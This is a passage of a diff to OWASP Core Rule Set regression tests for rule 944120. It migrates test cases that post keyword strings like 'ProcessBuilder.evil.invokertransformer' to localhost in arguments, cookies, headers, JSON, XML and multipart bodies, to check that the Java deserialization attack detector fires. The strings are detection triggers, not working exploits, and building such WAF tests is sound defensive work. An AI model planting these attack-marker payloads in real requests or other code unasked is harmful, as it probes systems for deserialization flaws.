"Content-Type application/json arg value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" + output: + log: + expect_ids: [944120] + - test_id: 81 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 82 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.invokertransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-83 + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 83 desc: 
"Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.invokertransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-84 + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 84 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.invokertransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-85 + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 85 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.invokertransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-86 + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 86 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log: + expect_ids: [944120] + - test_id: 87 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - 
stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory=test" + output: + log: + expect_ids: [944120] + - test_id: 88 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-89 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 89 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.prototypeclonefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-90 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeclonefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 90 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - 
output: - log_contains: "id \"944120\"" - - test_title: 944120-91 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 91 desc: "XML element includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-92 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 92 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-93 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 93 desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-94 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 94 desc: "XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-95 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log: + expect_ids: [944120] + - test_id: 95 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-96 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log: + expect_ids: [944120] + - test_id: 96 desc: "Content-Type 
text/plain includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-97 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log: + expect_ids: [944120] + - test_id: 97 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-98 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" + output: + log: + expect_ids: [944120] + - test_id: 98 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-99 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 99 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - 
-----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeclonefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-100 + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 100 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeclonefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-101 + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 101 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeclonefactory - 
-----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-102 + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 102 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeclonefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-103 + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 103 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 
80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-104 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log: + expect_ids: [944120] + - test_id: 104 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-105 + - input: 